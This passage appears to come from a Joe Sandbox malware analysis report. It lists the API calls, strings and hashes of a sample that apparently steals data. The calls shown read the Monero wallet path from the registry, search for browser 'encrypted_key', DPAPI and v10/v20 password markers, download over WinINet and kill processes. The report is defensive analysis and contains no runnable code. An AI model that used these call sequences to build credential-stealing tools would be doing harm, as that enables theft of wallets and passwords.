                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 23a52176e0cba7b60c2b9654afef30271beea544f3ef845ebf29296a94e6f299
                          • Instruction ID: cc2ecca81c3ff2522d19cb1afd591463386f9541d6b2d834c7488e94f98accb1
                          • Opcode Fuzzy Hash: 23a52176e0cba7b60c2b9654afef30271beea544f3ef845ebf29296a94e6f299
                          • Instruction Fuzzy Hash: 19710DB1D00219EFDB50DFA5DC80EDEB7B9EF58300F104569E509A7240EA359A89CF94
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00621135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00621159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00621173
                          • RegCloseKey.ADVAPI32(?), ref: 0062117D
                          Strings
                          • wallet_path, xrefs: 0062116D
                          • SOFTWARE\monero-project\monero-core, xrefs: 0062114F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 041db95ec0132fd1059761bea882e77521a6f9528c7d01dab21bf45b0e5548c5
                          • Instruction ID: 7cb07b298ddaa90d3c0d20ff459f37f2d6e21c4adefe348cde6f1b3e4b81050c
                          • Opcode Fuzzy Hash: 041db95ec0132fd1059761bea882e77521a6f9528c7d01dab21bf45b0e5548c5
                          • Instruction Fuzzy Hash: A3F03075640318FBD7109BE4AC4DFEA7B7CEB08717F100155FE05E6280EAB45A488BA0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00629E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00629E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00629EA7
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • lstrcpy.KERNEL32(00000000,00654C48), ref: 00629FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: 6ae39c7d889d03805908a794d7b63af2fcc92c617ec228d8c45894be3451a196
                          • Instruction ID: d2d5257362a77d4cec46c8d0bc80dc917a800c12817540bf35c87de6cb1d4a24
                          • Opcode Fuzzy Hash: 6ae39c7d889d03805908a794d7b63af2fcc92c617ec228d8c45894be3451a196
                          • Instruction Fuzzy Hash: 51511F71A1062AABCB50EF65EC42BDE77B6AF80315F150068FC49EB241CB70ED448FA0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0062565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00625661
                          • InternetOpenA.WININET(0064CFEC,00000000,00000000,00000000,00000000), ref: 00625677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00625692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006256BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 006256E1
                          • InternetCloseHandle.WININET(?), ref: 006256FA
                          • InternetCloseHandle.WININET(00000000), ref: 00625701
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 3ac297f4cb14ab3a0ff1d45b46b6c883a4f5e4b18b20c6bc025de8a711255d8f
                          • Instruction ID: 15f2253360e592b605b1566f9c0cd8863320b39125b8f7dc01a615bed8f9835b
                          • Opcode Fuzzy Hash: 3ac297f4cb14ab3a0ff1d45b46b6c883a4f5e4b18b20c6bc025de8a711255d8f
                          • Instruction Fuzzy Hash: 10418F70A40B15EFDB24CF54EC88BAAB7B5FF48305F1480A9E9099B3A0E7759941CF94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00644759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00644769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0064477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 006447AB
                          • CloseHandle.KERNEL32(00000000), ref: 006447B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 006447C0
                          • CloseHandle.KERNEL32(00000000), ref: 006447CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: f7e07d877b2395ce82a22957aeded66d1e5eb95b20427175f95649b6d6e8a06a
                          • Instruction ID: 87d7d0dc081af09da16a041c33060f350635b37e0a6c96f5dafa621b53dd4f1f
                          • Opcode Fuzzy Hash: f7e07d877b2395ce82a22957aeded66d1e5eb95b20427175f95649b6d6e8a06a
                          • Instruction Fuzzy Hash: CB01B171601714EBE7205B609C8AFEA77BDFB08753F000581F949E12D0EF789D818AA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00638435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063846C
                          • lstrlen.KERNEL32(00000000), ref: 006384B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006384E9
                          • lstrlen.KERNEL32(00000000), ref: 006384FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063852E
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 0063853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9e9e963f4b9e1bce4d67d3013ee131e6486291d156fc44a78001de08e7fc3e6f
                          • Instruction ID: fd4578edc457c8cb08251256207f7012f2982c1ea75def1bf59206fbf4899937
                          • Opcode Fuzzy Hash: 9e9e963f4b9e1bce4d67d3013ee131e6486291d156fc44a78001de08e7fc3e6f
                          • Instruction Fuzzy Hash: 29517A719006129FCB60DF68D894ADAB7FAEF48310F249459FC86DB345EF34E9418B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,006428A9), ref: 0064294B
                          • RegQueryValueExA.ADVAPI32(006428A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00642965
                          • RegCloseKey.ADVAPI32(006428A9), ref: 0064296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: f1c4a59dea1e879b7acbf85bec54c394c9769de2e8d6e6a9cab8a1bcb23fd2ac
                          • Instruction ID: 6da8f0e1624b54e13e94b22503849a5752f72d73161d1f3451cf331e804a8330
                          • Opcode Fuzzy Hash: f1c4a59dea1e879b7acbf85bec54c394c9769de2e8d6e6a9cab8a1bcb23fd2ac
                          • Instruction Fuzzy Hash: D601B175600315EBD310CBA09C59EEB7BBDFB48716F200099FE85A7280EA35590487A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064289C
                            • Part of subcall function 00642910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642925
                            • Part of subcall function 00642910: RtlAllocateHeap.NTDLL(00000000), ref: 0064292C
                            • Part of subcall function 00642910: RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,006428A9), ref: 0064294B
                            • Part of subcall function 00642910: RegQueryValueExA.ADVAPI32(006428A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00642965
                            • Part of subcall function 00642910: RegCloseKey.ADVAPI32(006428A9), ref: 0064296F
                          • RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,00639500), ref: 006428D1
                          • RegQueryValueExA.ADVAPI32(00639500,0129E008,00000000,00000000,00000000,000000FF), ref: 006428EC
                          • RegCloseKey.ADVAPI32(00639500), ref: 006428F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 9671f705132a2e33f6cd96720dff164504234b778ec1f16776cee696e87b5238
                          • Instruction ID: 1c91e9630f098760fbed8249b2e45c1e17468ebec8b03a50f169cf58943ded18
                          • Opcode Fuzzy Hash: 9671f705132a2e33f6cd96720dff164504234b778ec1f16776cee696e87b5238
                          • Instruction Fuzzy Hash: 1101A271A00319FFD7109BA4AC4DEAE7B6EFB44317F100599FE08E2290DA7859448BA0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0062723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00627279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 006272C3
                          • HeapFree.KERNEL32(00000000), ref: 006272CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00627329
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 4c035dd60f60d9b07451dde1bfc085fa5536bd8da412fc54f3536ddd6cf8c87e
                          • Instruction ID: f420a2e558b254bb5175c799e7b0a120b319d65ec5e67c52dc841c439c5c341e
                          • Opcode Fuzzy Hash: 4c035dd60f60d9b07451dde1bfc085fa5536bd8da412fc54f3536ddd6cf8c87e
                          • Instruction Fuzzy Hash: A6413C71705B16DBDB20CF69EC84BAAB3E9FB88315F144569EC49C7350E635E9009B50
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00629CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00629CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: a02b5404cc9f5ec33b6af621f8a2318548fe45cff370bdd430c08f4c6b4f6095
